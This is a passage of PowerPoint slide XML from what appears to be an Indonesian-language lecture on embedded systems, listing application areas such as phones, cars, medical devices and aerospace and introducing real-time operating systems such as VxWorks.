              <a:t>cuci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kopi, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengoperasiannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan tablet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sensor, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>modul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>otomotif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mobil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hiburan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keselamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>udara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan rem anti-lock.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> robot, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perakitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan sensor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>medis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pacu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pompa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> insulin, dan monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>glukosa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>darah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kedirgantaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesawat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> terbang, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satelit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>militer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>navigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</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142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52420588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Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Waktu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Nyata</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Waktu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (RTOS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecepatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> RTOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VxWorks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedirgantaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. VxWorks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesawat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> terbang, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
